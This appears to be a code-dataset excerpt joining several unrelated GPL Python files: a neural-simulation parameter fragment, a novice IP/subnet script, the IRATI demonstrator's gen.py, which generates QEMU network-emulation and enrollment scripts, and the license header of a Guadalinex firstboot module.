('net_pars', net_pars),
('encoding_pars', encoding_pars),
('connection_pars', connection_pars),
('analysis_pars', analysis_pars)])
# ######################################################################################################################
# PARAMETER RANGE declarations
# ======================================================================================================================
parameter_range = {
'g': [11.],
'nu_x': [14.]
}
| rcfduarte/nmsat | projects/examples/parameters/noise_driven_dynamics.py | Python | gpl-2.0 | 6,567 |
#!/usr/bin/python
#my_subnet = input("Enter Subnet address:")
my_ip = "192.168.1.100"
my_subnet = "255.255.255.0"
ip = my_ip.split(".")
print ip
# Check the validity of the ip address
while True:
#my_ip = input("Enter a ip address:")
if int(ip[0]) <= 223 and (int(ip[1]) != 169 or int(ip[2]) != 254) and (int(ip[1]) <= 254 and int(ip[2]) <= 254 and int(ip[3]) <= 254):
print "You entered a valid ip"
break
else:
print "You entered a wrong ip"
continue
bin_ip = ""
for a in ip:
print bin(int(a)).split("b")[1].zfill(8)
bin_ip += bin(int(a)).split("b")[1].zfill(8)
print bin_ip
print type(bin_ip)
| hiteshagrawal/python | networking/subnet-cal.py | Python | gpl-2.0 | 620 |
#!/usr/bin/env python
#
# Copyright (C) 2014-2017 Nextworks
# Author: Vincenzo Maffione <v.maffione@nextworks.it>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# A tool for live demonstrations and regression testing for the IRATI stack
import multiprocessing
import gen_templates
import subprocess
import argparse
import json
import copy
import re
import os
def which(program):
FNULL = open(os.devnull, 'w')
retcode = subprocess.call(['which', program], stdout = FNULL,
stderr = subprocess.STDOUT)
if retcode != 0:
print('Fatal error: Cannot find "%s" program' % program)
quit(1)
def dict_dump_json(file_name, dictionary, env_dict):
dictionary_str = json.dumps(dictionary, indent = 4,
sort_keys = True) % env_dict
fout = open(file_name, 'w')
fout.write(dictionary_str);
fout.close()
def joincat(haystack, needle):
return ' '.join([needle, haystack])
def netem_validate(netem_args):
ret = True
try:
fdevnull = open(os.devnull, 'w')
subprocess.check_call('sudo ip tuntap add mode tap name tapiratiprobe'.split())
subprocess.check_call(('sudo tc qdisc add dev '\
'tapiratiprobe root netem %s'\
% netem_args).split(), stdout=fdevnull,
stderr=fdevnull)
fdevnull.close()
except:
ret = False
subprocess.call('sudo ip tuntap del mode tap name tapiratiprobe'.split())
return ret
description = "Python script to generate IRATI deployments for Virtual Machines"
epilog = "2016 Vincenzo Maffione <v.maffione@nextworks.it>"
argparser = argparse.ArgumentParser(description = description,
epilog = epilog)
argparser.add_argument('-c', '--conf',
help = "gen.conf configuration file", type = str,
default = 'gen.conf')
argparser.add_argument('-g', '--graphviz', action='store_true',
help = "Generate DIF graphs with graphviz")
argparser.add_argument('--legacy', action='store_true',
help = "Use qcow2 image rather than buildroot ramfs")
argparser.add_argument('-m', '--memory',
help = "Amount of memory in megabytes", type = int,
default = '164')
argparser.add_argument('-e', '--enrollment-strategy',
help = "Minimal uses a spanning tree of each DIF",
type = str, choices = ['minimal', 'full-mesh', 'manual'],
default = 'minimal')
argparser.add_argument('--ring',
help = "Use ring topology with variable number of nodes",
type = int)
argparser.add_argument('--kernel',
help = "custom kernel buildroot image", type = str,
default = 'buildroot/bzImage')
argparser.add_argument('--initramfs',
help = "custom initramfs buildroot image", type = str,
default = 'buildroot/rootfs.cpio')
argparser.add_argument('-f', '--frontend',
help = "Choose which emulated NIC the nodes will use",
type = str, choices = ['virtio-net-pci', 'e1000'],
default = 'virtio-net-pci')
argparser.add_argument('--vhost', action='store_true',
help = "Use vhost acceleration for virtio-net frontend")
argparser.add_argument('--manager', action='store_true',
help = "Add support for NMS manager and dedicated LAN")
argparser.add_argument('--manager-kernel',
help = "custom kernel buildroot image for the manager",
type = str, default = 'buildroot/bzImage')
argparser.add_argument('--manager-initramfs',
help = "custom initramfs buildroot image for the manager",
type = str, default = 'buildroot/rootfs.cpio')
argparser.add_argument('--overlay',
help = "Overlay the specified directory in the generated image",
type = str)
argparser.add_argument('--loglevel',
help = "Set verbosity level",
choices = ['DBG', 'INFO', 'NOTE', 'WARN', 'ERR', 'CRIT', 'ALERT', 'EMERG'],
default = 'DBG')
args = argparser.parse_args()
which('brctl')
which('qemu-system-x86_64')
subprocess.call(['chmod', '0400', 'buildroot/irati_rsa'])
if args.overlay:
args.overlay = os.path.abspath(args.overlay)
if not os.path.isdir(args.overlay):
args.overlay = None
if args.legacy:
sshopts = ''
sudo = 'sudo'
else:
sshopts = '-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null '\
'-o IdentityFile=buildroot/irati_rsa'
sudo = ''
if args.legacy:
######################## Compile mac2ifname program ########################
try:
subprocess.call(['cc', '-Wall', '-o', 'mac2ifname', 'mac2ifname.c'])
except:
print('Cannot find a C compiler to compile mac2ifname program')
quit(1)
env_dict = {}
keywords = ['vmimgpath', 'installpath', 'username', 'baseport']
############################## Parse gen.env ###############################
fin = open('gen.env', 'r')
while 1:
line = fin.readline()
if line == '':
break
m = re.match(r'(\S+)\s*=\s*(\S+)', line)
if m == None:
continue
key = m.group(1)
value = m.group(2)
if key not in keywords:
print('Unrecognized keyword %s' % (key))
continue
env_dict[key] = value
fin.close()
for key in keywords:
if key not in env_dict:
print("Configuration variables missing")
quit(1)
env_dict['baseport'] = int(env_dict['baseport'])
env_dict['varpath'] = env_dict['installpath']
if not args.legacy:
# overwrite vmimgpath, installpath, varpath, username
env_dict['vmimgpath'] = args.initramfs
env_dict['installpath'] = '/usr'
env_dict['varpath'] = ''
env_dict['username'] = 'root'
# Possibly autogenerate ring topology
if args.ring != None and args.ring > 0:
print("Ignoring %s, generating ring topology" % (args.conf,))
fout = open('ring.conf', 'w')
for i in range(args.ring):
i_next = i + 1
if i_next == args.ring:
i_next = 0
fout.write('eth %(vlan)s 0Mbps m%(i)s m%(inext)s\n' % \
{'i': i+1, 'inext': i_next+1, 'vlan': i+1+100})
for i in range(args.ring):
i_prev = i - 1
if i_prev < 0:
i_prev = args.ring - 1
fout.write('dif n m%(i)s %(vlan)s %(vprev)s\n' % \
{'i': i+1, 'vlan': i+1+100, 'vprev': i_prev+1+100})
fout.close()
args.conf = 'ring.conf'
# Some constants related to the RINA management
injected_lines = []
mgmt_shim_dif_name = '3456'
mgmt_dif_name = 'NMS'
mgmt_node_name = 'mgr'
if not os.path.exists(args.conf):
print("Error: %s not found" % args.conf)
quit()
# Try to check that gen.conf is ASCII
try:
o = subprocess.check_output(['file', args.conf])
o = str(o).upper()
if o.find('ASCII') == -1:
print("Error: %s is not ASCII encoded" % args.conf)
quit()
except Exception as e:
print(e)
pass
############################# Parse gen.conf ##############################
fin = open(args.conf, 'r')
vms = dict()
shims = dict()
links = []
difs = dict()
enrollments = dict()
dif_policies = dict()
dif_graphs = dict()
app_mappings = []
overlays = dict()
netems = dict()
manual_enrollments = dict()
linecnt = 0
conf_injection = True
while 1:
try:
line = fin.readline()
except UnicodeDecodeError:
print("Error: demo.conf must be ASCII encoded")
quit()
if line == '':
# EOF, try to pick from injected lines
if len(injected_lines) > 0:
line = injected_lines.pop(0)
if line == '':
if not conf_injection:
# Injection already done, let's stop now
break
# Inject new lines and continue
conf_injection = False
if args.manager:
vm_list = [vmname for vmname in sorted(vms)]
vm_list.append(mgmt_node_name) # a VM for the manager
injected_lines.append('eth %s 0Mbps %s' % (mgmt_shim_dif_name, ' '.join(vm_list)))
for vmname in vm_list:
injected_lines.append('dif %s %s %s' % (mgmt_dif_name, vmname, mgmt_shim_dif_name))
continue
linecnt += 1
line = line.replace('\n', '')
if line.startswith('#'):
continue
if re.match(r'\s*$', line):
continue
m = re.match(r'\s*eth\s+(\d+)\s+(\d+)([GMK])bps\s+(\w.*)$', line)
if m:
vlan = m.group(1)
speed = int(m.group(2))
speed_unit = m.group(3).lower()
vm_list = m.group(4).split()
if vlan in shims:
print('Error: Line %d: shim %s already defined' \
% (linecnt, vlan))
continue
shims[vlan] = {'bridge': 'rbr' + vlan, 'vlan': vlan, 'speed': speed,
'speed_unit': speed_unit}
for vm in vm_list:
if vm not in vms:
vms[vm] = {'name': vm, 'ports': []}
links.append((vlan, vm))
#for i in range(len(vm_list)-1):
# for j in range(i + 1, len(vm_list)):
# print(vm_list[i], vm_list[j])
continue
m = re.match(r'\s*dif\s+([\w-]+)\s+([\w-]+)\s+([\w-].*)$', line)
if m:
dif = m.group(1)
vm = m.group(2)
dif_list = m.group(3).split()
if vm not in vms:
vms[vm] = {'name': vm, 'ports': []}
if dif not in difs:
difs[dif] = dict()
if vm in difs[dif]:
print('Error: Line %d: vm %s in dif %s already specified' \
% (linecnt, vm, dif))
continue
difs[dif][vm] = dif_list
continue
m = re.match(r'\s*policy\s+([\w-]+)\s+(\*|(?:(?:[\w-]+,)*[\w-]+))\s+([*\w.-]+)\s+([\w-]+)((?:\s+[\w.-]+\s*=\s*[/\w.-]+)*)\s*$', line)
if m:
dif = m.group(1)
nodes = m.group(2)
path = m.group(3)
ps = m.group(4)
parms = list()
if m.group(5) != None:
parms_str = m.group(5).strip()
if parms_str != '':
parms = parms_str.split(' ')
if dif not in dif_policies:
dif_policies[dif] = []
if nodes == '*':
nodes = []
else:
nodes = nodes.split(',')
dif_policies[dif].append({'path': path, 'nodes': nodes,
'ps': ps, 'parms' : parms})
if not gen_templates.policy_path_valid(path):
print('Unknown component path "%s"' % path)
quit(1)
continue
m = re.match(r'\s*appmap\s+([\w-]+)\s+([\w.]+)\s+(\d+)\s*$', line)
if m:
dif = m.group(1)
apname = m.group(2)
apinst = m.group(3)
app_mappings.append({'name': '%s-%s--' % (apname, apinst), 'dif' : dif})
continue
m = re.match(r'\s*overlay\s+([\w-]+)\s+([\w.-/]+\s*$)', line)
if m:
vmname = m.group(1)
opath = m.group(2)
opath = os.path.abspath(opath)
if not os.path.isdir(opath):
print("Error: line %d: no such overlay path" % linecnt)
continue
overlays[vmname] = opath
continue
m = re.match(r'\s*netem\s+(\d+)\s+([\w-]+)\s+(\w.*)$', line)
if m:
dif = m.group(1)
vmname = m.group(2)
netem_args = m.group(3)
if dif not in netems:
netems[dif] = dict()
netems[dif][vmname] = {'args': netem_args, 'linecnt': linecnt}
continue
m = re.match(r'\s*enroll\s+([\w.-]+)\s+([\w.-]+)\s+([\w.-]+)\s+([\w.-]+)\s*$', line)
if m:
if args.enrollment_strategy != 'manual':
print('Warning: ignoring enroll directive at line %d' % linecnt)
continue
dif_name = m.group(1)
enrollee = m.group(2)
enroller = m.group(3)
n_1_dif = m.group(4)
if dif_name not in manual_enrollments:
manual_enrollments[dif_name] = []
manual_enrollments[dif_name].append({
'enrollee': enrollee,
'enroller': enroller,
'lower_dif': n_1_dif,
'linecnt': linecnt})
continue
print("Error: line %d not recognized" % linecnt)
quit()
fin.close()
for dif in difs:
if dif not in dif_policies:
dif_policies[dif] = []
boot_batch_size = max(1, multiprocessing.cpu_count() / 2)
wait_for_boot = 12 # in seconds
if len(vms) > 8:
print("You want to run a lot of nodes, so it's better if I give "
"each node some time to boot (since the boot is CPU-intensive)")
############ Compute registration/enrollment order for DIFs ###############
# Compute DIFs dependency graph, as both adjacency and incidence list.
difsdeps_adj = dict()
difsdeps_inc = dict()
for dif in difs:
difsdeps_inc[dif] = set()
difsdeps_adj[dif] = set()
for shim in shims:
difsdeps_inc[shim] = set()
difsdeps_adj[shim] = set()
for dif in difs:
for vmname in difs[dif]:
for lower_dif in difs[dif][vmname]:
difsdeps_inc[dif].add(lower_dif)
difsdeps_adj[lower_dif].add(dif)
# Kahn's algorithm below only needs per-node count of
# incident edges, so we compute these counts from the
# incidence list and drop the latter.
difsdeps_inc_cnt = dict()
for dif in difsdeps_inc:
difsdeps_inc_cnt[dif] = len(difsdeps_inc[dif])
del difsdeps_inc
#print(difsdeps_adj)
#print(difsdeps_inc_cnt)
# Run Kahn's algorithm to compute topological ordering on the DIFs graph.
frontier = set()
dif_ordering = []
for dif in difsdeps_inc_cnt:
if difsdeps_inc_cnt[dif] == 0:
frontier.add(dif)
while len(frontier):
cur = frontier.pop()
dif_ordering.append(cur)
for nxt in difsdeps_adj[cur]:
difsdeps_inc_cnt[nxt] -= 1
if difsdeps_inc_cnt[nxt] == 0:
frontier.add(nxt)
difsdeps_adj[cur] = set()
circular_set = [dif for dif in difsdeps_inc_cnt if difsdeps_inc_cnt[dif] != 0]
if len(circular_set):
print("Fatal error: The specified DIFs topology has one or more"\
"circular dependencies, involving the following"\
" DIFs: %s" % circular_set)
print(" DIFs dependency graph: %s" % difsdeps_adj);
quit(1)
####################### Compute DIF graphs #######################
for dif in difs:
neighsets = dict()
dif_graphs[dif] = dict()
first = None
# For each N-1-DIF supporting this DIF, compute the set of nodes that
# share such N-1-DIF. This set will be called the 'neighset' of
# the N-1-DIF for the current DIF.
for vmname in difs[dif]:
dif_graphs[dif][vmname] = [] # init for later use
if first == None: # pick any node for later use
first = vmname
for lower_dif in difs[dif][vmname]:
if lower_dif not in neighsets:
neighsets[lower_dif] = []
neighsets[lower_dif].append(vmname)
# Build the graph, represented as adjacency list
for lower_dif in neighsets:
# Each neighset corresponds to a complete (sub)graph.
for vm1 in neighsets[lower_dif]:
for vm2 in neighsets[lower_dif]:
if vm1 != vm2:
dif_graphs[dif][vm1].append((vm2, lower_dif))
enrollments[dif] = []
if args.manager and dif == mgmt_dif_name:
# Enrollment in the NMS DIF is managed as a special case:
# each node is enrolled against the manager node
for vmname in vms:
if vmname != mgmt_node_name:
enrollments[dif].append({'enrollee': vmname,
'enroller': mgmt_node_name,
'lower_dif': mgmt_shim_dif_name})
elif args.enrollment_strategy == 'minimal':
# To generate the list of enrollments, we simulate one,
# using breadth-first trasversal.
enrolled = set([first])
frontier = set([first])
while len(frontier):
cur = frontier.pop()
for edge in dif_graphs[dif][cur]:
if edge[0] not in enrolled:
enrolled.add(edge[0])
enrollments[dif].append({'enrollee': edge[0],
'enroller': cur,
'lower_dif': edge[1]})
frontier.add(edge[0])
elif args.enrollment_strategy == 'full-mesh':
for cur in dif_graphs[dif]:
for edge in dif_graphs[dif][cur]:
if cur < edge[0]:
enrollments[dif].append({'enrollee': cur,
'enroller': edge[0],
'lower_dif': edge[1]})
elif args.enrollment_strategy == 'manual':
if dif not in manual_enrollments:
continue
for e in manual_enrollments[dif]:
if e['enrollee'] not in difs[dif]:
print('Warning: ignoring line %d because VM %s does '\
'not belong to DIF %s' % (e['linecnt'],
e['enrollee'], dif))
continue
if e['enroller'] not in difs[dif]:
print('Warning: ignoring line %d because VM %s does '\
'not belong to DIF %s' % (e['linecnt'],
e['enroller'], dif))
continue
if e['lower_dif'] not in neighsets or \
e['enrollee'] not in neighsets[e['lower_dif']]:
print('Warning: ignoring line %d because VM %s cannot '\
'use N-1-DIF %s' % (e['linecnt'], e['enrollee'],
e['lower_dif']))
continue
if e['lower_dif'] not in neighsets or \
e['enroller'] not in neighsets[e['lower_dif']]:
print('Warning: ignoring line %d because VM %s cannot '\
'use N-1-DIF %s' % (e['linecnt'], e['enroller'],
e['lower_dif']))
continue
enrollments[dif].append(e)
else:
# This is a bug
assert(False)
#print(neighsets)
#print(dif_graphs[dif])
for shim in shims:
enrollments[shim] = dict()
###################### Generate UP script ########################
fout = open('up.sh', 'w')
outs = '#!/bin/bash\n' \
'\n' \
'set -x\n' \
'\n';
for shim in sorted(shims):
outs += 'sudo brctl addbr %(br)s\n' \
'sudo ip link set %(br)s up\n' \
'\n' % {'br': shims[shim]['bridge']}
for l in sorted(links):
shim, vm = l
b = shims[shim]['bridge']
idx = len(vms[vm]['ports']) + 1
tap = '%s.%02x' % (vm, idx)
outs += 'sudo ip tuntap add mode tap name %(tap)s\n' \
'sudo ip link set %(tap)s up\n' \
'sudo brctl addif %(br)s %(tap)s\n\n' \
% {'tap': tap, 'br': b}
if shims[shim]['speed'] > 0:
speed = '%d%sbit' % (shims[shim]['speed'], shims[shim]['speed_unit'])
# Rate limit the traffic transmitted on the TAP interface
outs += 'sudo tc qdisc add dev %(tap)s handle 1: root ' \
'htb default 11\n' \
'sudo tc class add dev %(tap)s parent 1: classid ' \
'1:1 htb rate 10gbit\n' \
'sudo tc class add dev %(tap)s parent 1:1 classid ' \
'1:11 htb rate %(speed)s\n' \
% {'tap': tap, 'speed': speed}
if shim in netems:
if vm in netems[shim]:
if not netem_validate(netems[shim][vm]['args']):
print('Warning: line %(linecnt)s is invalid and '\
'will be ignored' % netems[shim][vm])
continue
outs += 'sudo tc qdisc add dev %(tap)s root netem '\
'%(args)s\n'\
% {'tap': tap, 'args': netems[shim][vm]['args']}
vms[vm]['ports'].append({'tap': tap, 'br': b, 'idx': idx,
'vlan': shim})
vmid = 1
budget = boot_batch_size
for vmname in sorted(vms):
vm = vms[vmname]
vm['id'] = vmid
fwdp = env_dict['baseport'] + vmid
mac = '00:0a:0a:0a:%02x:%02x' % (vmid, 99)
vm['ssh'] = fwdp
vars_dict = {'fwdp': fwdp, 'id': vmid, 'mac': mac,
'vmimgpath': env_dict['vmimgpath'],
'memory': args.memory, 'kernel': args.kernel,
'frontend': args.frontend, 'vmname': vmname}
if vmname == mgmt_node_name:
vars_dict['vmimgpath'] = args.manager_initramfs
vars_dict['kernel'] = args.manager_kernel
outs += 'qemu-system-x86_64 '
if not args.legacy:
outs += '-kernel %(kernel)s ' \
'-append "console=ttyS0" ' \
'-initrd %(vmimgpath)s ' \
% vars_dict
else:
outs += '"%(vmimgpath)s" ' \
'-snapshot ' % vars_dict
outs += '-display none ' \
'--enable-kvm ' \
'-smp 2 ' \
'-m %(memory)sM ' \
'-device %(frontend)s,mac=%(mac)s,netdev=mgmt ' \
'-netdev user,id=mgmt,hostfwd=tcp::%(fwdp)s-:22 ' \
'-vga std ' \
'-pidfile rina-%(id)s.pid ' \
'-serial file:%(vmname)s.log ' \
% vars_dict
del vars_dict
for port in vm['ports']:
tap = port['tap']
mac = '00:0a:0a:0a:%02x:%02x' % (vmid, port['idx'])
port['mac'] = mac
outs += '' \
'-device %(frontend)s,mac=%(mac)s,netdev=data%(idx)s ' \
'-netdev tap,ifname=%(tap)s,id=data%(idx)s,script=no,downscript=no'\
'%(vhost)s '\
% {'mac': mac, 'tap': tap, 'idx': port['idx'],
'frontend': args.frontend,
'vhost': ',vhost=on' if args.vhost else ''}
outs += '&\n\n'
budget -= 1
if budget <= 0:
outs += 'sleep %s\n' % wait_for_boot
budget = boot_batch_size
vmid += 1
for vmname in sorted(vms):
vm = vms[vmname]
gen_files_conf = 'shimeth.%(name)s.*.dif da.map %(name)s.ipcm.conf' % {'name': vmname}
if any(vmname in difs[difname] for difname in difs):
gen_files_conf = joincat(gen_files_conf, 'normal.%(name)s.*.dif' % {'name': vmname})
gen_files_bin = 'enroll.py'
overlay = ''
per_vm_overlay = ''
if args.legacy:
gen_files_bin = joincat(gen_files_bin, 'mac2ifname')
if args.overlay:
overlay = args.overlay
if vmname in overlays:
per_vm_overlay = overlays[vmname]
ipcm_components = ['scripting', 'console']
if args.manager:
ipcm_components.append('mad')
ipcm_components = ', '.join(ipcm_components)
gen_files = ' '.join([gen_files_conf, gen_files_bin, overlay, per_vm_overlay])
outs += ''\
'DONE=255\n'\
'while [ $DONE != "0" ]; do\n'\
' scp %(sshopts)s -r -P %(ssh)s %(genfiles)s %(username)s@localhost: \n'\
' DONE=$?\n'\
' if [ $DONE != "0" ]; then\n'\
' sleep 1\n'\
' fi\n'\
'done\n\n'\
'ssh %(sshopts)s -p %(ssh)s %(username)s@localhost << \'ENDSSH\'\n'\
'set -x\n'\
'SUDO=%(sudo)s\n'\
'$SUDO hostname %(name)s\n'\
'$SUDO modprobe rina-irati-core\n'\
'$SUDO chmod a+rw /dev/irati\n'\
'\n'\
'$SUDO mv %(genfilesconf)s /etc\n'\
'$SUDO mv %(genfilesbin)s /usr/bin\n'\
'\n' % {'name': vm['name'], 'ssh': vm['ssh'], 'id': vm['id'],
'username': env_dict['username'],
'genfiles': gen_files, 'genfilesconf': gen_files_conf,
'genfilesbin': gen_files_bin, 'vmname': vm['name'],
'sshopts': sshopts, 'sudo': sudo}
for ov in [overlay, per_vm_overlay]:
if ov != '':
outs += '$SUDO cp -r %(ov)s/* /\n'\
'$SUDO rm -rf %(ov)s\n'\
% {'ov': os.path.basename(ov)}
for port in vm['ports']:
outs += 'PORT=$(mac2ifname %(mac)s)\n'\
'$SUDO ip link set $PORT up\n'\
'$SUDO ip link add link $PORT name $PORT.%(vlan)s type vlan id %(vlan)s\n'\
'$SUDO ip link set $PORT.%(vlan)s up\n'\
'$SUDO sed -i "s|ifc%(idx)s|$PORT|g" /etc/shimeth.%(vmname)s.%(vlan)s.dif\n'\
% {'mac': port['mac'], 'idx': port['idx'],
'id': vm['id'], 'vlan': port['vlan'],
'vmname': vm['name']}
outs += '$SUDO modprobe shim-eth-vlan\n'\
'$SUDO modprobe normal-ipcp\n'
outs += '$SUDO modprobe rina-default-plugin\n'\
'$SUDO %(installpath)s/bin/ipcm -a \"%(ipcmcomps)s\" '\
'-c /etc/%(vmname)s.ipcm.conf -l %(verb)s &> log &\n'\
'sleep 1\n'\
'true\n'\
'ENDSSH\n' % {'installpath': env_dict['installpath'],
'vmname': vm['name'], 'verb': args.loglevel,
'ipcmcomps': ipcm_components}
# Run the enrollment operations in an order which respect the dependencies
for dif in dif_ordering:
for enrollment in enrollments[dif]:
vm = vms[enrollment['enrollee']]
print('I am going to enroll %s to DIF %s against neighbor %s, through '\
'lower DIF %s' % (enrollment['enrollee'], dif,
enrollment['enroller'],
enrollment['lower_dif']))
outs += 'sleep 2\n' # important!!
outs += ''\
'DONE=255\n'\
'while [ $DONE != "0" ]; do\n'\
' ssh %(sshopts)s -p %(ssh)s %(username)s@localhost << \'ENDSSH\'\n'\
'set -x\n'\
'SUDO=%(sudo)s\n'\
'$SUDO enroll.py --lower-dif %(ldif)s --dif %(dif)s '\
'--ipcm-conf /etc/%(vmname)s.ipcm.conf '\
'--enrollee-name %(vmname)s.%(dif)s '\
'--enroller-name %(enroller)s.%(dif)s\n'\
'sleep 1\n'\
'true\n'\
'ENDSSH\n'\
' DONE=$?\n'\
' if [ $DONE != "0" ]; then\n'\
' sleep 1\n'\
' fi\n'\
'done\n\n' % {'ssh': vm['ssh'], 'id': vm['id'],
'pvid': vms[enrollment['enroller']]['id'],
'username': env_dict['username'],
'vmname': vm['name'],
'enroller': enrollment['enroller'],
'dif': dif, 'ldif': enrollment['lower_dif'],
'sshopts': sshopts, 'sudo': sudo}
fout.write(outs)
fout.close()
subprocess.call(['chmod', '+x', 'up.sh'])
###################### Generate DOWN script ########################
fout = open('down.sh', 'w')
outs = '#!/bin/bash\n' \
'\n' \
'set -x\n' \
'\n' \
'kill_qemu() {\n' \
' PIDFILE=$1\n' \
' PID=$(cat $PIDFILE)\n' \
' if [ -n $PID ]; then\n' \
' kill $PID\n' \
' while [ -n "$(ps -p $PID -o comm=)" ]; do\n' \
' sleep 1\n' \
' done\n' \
' fi\n' \
'\n' \
' rm $PIDFILE\n' \
'}\n\n'
for vmname in sorted(vms):
vm = vms[vmname]
outs += 'kill_qemu rina-%(id)s.pid\n' % {'id': vm['id']}
outs += '\n'
for vmname in sorted(vms):
vm = vms[vmname]
for port in vm['ports']:
tap = port['tap']
b = port['br']
outs += 'sudo brctl delif %(br)s %(tap)s\n' \
'sudo ip link set %(tap)s down\n' \
'sudo ip tuntap del mode tap name %(tap)s\n\n' \
% {'tap': tap, 'br': b}
for shim in sorted(shims):
outs += 'sudo ip link set %(br)s down\n' \
'sudo brctl delbr %(br)s\n' \
'\n' % {'br': shims[shim]['bridge']}
fout.write(outs)
fout.close()
subprocess.call(['chmod', '+x', 'down.sh'])
################## Generate IPCM/DIF configuration files ##################
ipcmconfs = dict()
# If some app directives were specified, use those to build da.map.
# Otherwise, assume the standard applications are to be mapped in
# the DIF with the highest rank.
if len(app_mappings) == 0:
if len(dif_ordering) > 0:
for adm in gen_templates.da_map_base["applicationToDIFMappings"]:
adm["difName"] = "%s" % (dif_ordering[-1],)
else:
gen_templates.da_map_base["applicationToDIFMappings"] = []
for apm in app_mappings:
gen_templates.da_map_base["applicationToDIFMappings"].append({
"encodedAppName": apm['name'],
"difName": "%s" % (apm['dif'])
})
if args.manager:
# Add MAD/Manager configuration
gen_templates.ipcmconf_base["addons"] = {
"mad": {
"managerConnections" : [ {
"managerAppName" : "manager-1--",
"DIF": "%s" % (mgmt_dif_name)
}
]
}
}
for vmname in vms:
ipcmconfs[vmname] = copy.deepcopy(gen_templates.ipcmconf_base)
difconfs = dict()
for dif in difs:
difconfs[dif] = dict()
for vmname in difs[dif]:
difconfs[dif][vmname] = copy.deepcopy(gen_templates.normal_dif_base)
for vmname in sorted(vms):
vm = vms[vmname]
ipcmconf = ipcmconfs[vmname]
for port in vm['ports']:
ipcmconf["ipcProcessesToCreate"].append({
"difName": port['vlan']
})
template_file_name = 'shimeth.%s.%s.dif' % (vm['name'], port['vlan'])
ipcmconf["difConfigurations"].append({
"name": port['vlan'],
"template": template_file_name
})
fout = open(template_file_name, 'w')
fout.write(json.dumps({"difType": "shim-eth-vlan",
"configParameters": {
"interface-name": "ifc%d" % (port['idx'],)
}
},
indent=4, sort_keys=True))
fout.close()
# Run over dif_ordering array, to make sure each IPCM config has
# the correct ordering for the ipcProcessesToCreate list of operations.
# If we iterated over the difs map, the order would be randomic, and so
# some IPCP registrations in lower DIFs may fail. This would happen because
# at the moment of registration, it may be that the IPCP of the lower DIF
# has not been created yet.
for dif in dif_ordering:
if dif in shims:
# Shims are managed separately, in the previous loop
continue
for vmname in difs[dif]:
vm = vms[vmname]
ipcmconf = ipcmconfs[vmname]
normal_ipcp = { "difName": "%s" % (dif,) }
normal_ipcp["difsToRegisterAt"] = []
for lower_dif in difs[dif][vmname]:
if lower_dif not in shims:
lower_dif = lower_dif
normal_ipcp["difsToRegisterAt"].append(lower_dif)
ipcmconf["ipcProcessesToCreate"].append(normal_ipcp)
ipcmconf["difConfigurations"].append({
"name": "%s" % (dif),
"template": "normal.%s.%s.dif" % (vmname, dif)
})
# Fill in the map of IPCP addresses. This could be moved at difconfs
# deepcopy-time
for ovm in difs[dif]:
difconfs[dif][ovm]["knownIPCProcessAddresses"].append({
"apName": "%s.%s" % (vmname, dif),
"apInstance": "1",
"address": 16 + vm['id']
})
for policy in dif_policies[dif]:
if policy['nodes'] == [] or vmname in policy['nodes']:
gen_templates.translate_policy(difconfs[dif][vmname], policy['path'],
policy['ps'], policy['parms'])
# Dump the DIF Allocator map
dict_dump_json('da.map', gen_templates.da_map_base, env_dict)
for vmname in vms:
# Dump the IPCM configuration files
env_dict['sysname'] = '%s' %(vmname)
dict_dump_json('%s.ipcm.conf' % (vmname), ipcmconfs[vmname], env_dict)
for dif in difs:
for vmname in difs[dif]:
# Dump the normal DIF configuration files
dict_dump_json('normal.%s.%s.dif' % (vmname, dif,),
difconfs[dif][vmname], env_dict)
# Dump the mapping from nodes to SSH ports
fout = open('gen.map', 'w')
for vmname in sorted(vms):
fout.write('%s %d\n' % (vmname, env_dict['baseport'] + vms[vmname]['id']))
fout.close()
if args.graphviz:
try:
import pydot
colors = ['red', 'green', 'blue', 'orange', 'yellow']
fcolors = ['black', 'black', 'white', 'black', 'black']
gvizg = pydot.Dot(graph_type = 'graph')
i = 0
for dif in difs:
for vmname in dif_graphs[dif]:
node = pydot.Node(dif + vmname,
label = "%s(%s)" % (vmname, dif),
style = "filled", fillcolor = colors[i],
fontcolor = fcolors[i])
gvizg.add_node(node)
for vmname in dif_graphs[dif]:
for (neigh, lower_dif) in dif_graphs[dif][vmname]:
if vmname > neigh:
# Use lexicographical filter to avoid duplicate edges
continue
color = 'black'
# If enrollment is going to happen on this edge, color
# it in red
for enrollment in enrollments[dif]:
ee = enrollment['enrollee']
er = enrollment['enroller']
lo = enrollment['lower_dif']
if lo.endswith(".DIF"):
lo = lo[:-4]
if lower_dif == lo and \
((vmname == ee and neigh == er) or \
(vmname == er and neigh == ee)):
color = 'red'
break
edge = pydot.Edge(dif + vmname, dif + neigh,
label = lower_dif, color = color)
gvizg.add_edge(edge)
i += 1
if i == len(colors):
i = 0
gvizg.write_png('difs.png')
except:
print("Warning: pydot module not installed, cannot produce DIF "\
"graphs images")
| edugrasa/demonstrator | gen.py | Python | gpl-2.0 | 37,281 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
import firstboot.serverconf
from ChefConf import ChefConf
from GCCConf import GCCConf
from AuthConf import AuthConf
from DateSyncConf import DateSyncConf
from UsersConf import UsersConf
class Singleton:
"""
A non-thread-safe helper class to ease implementing singletons.
This should be used as a decorator -- not a metaclass -- to the
class that should be a singleton.
The decorated class can define one `__init__` function that
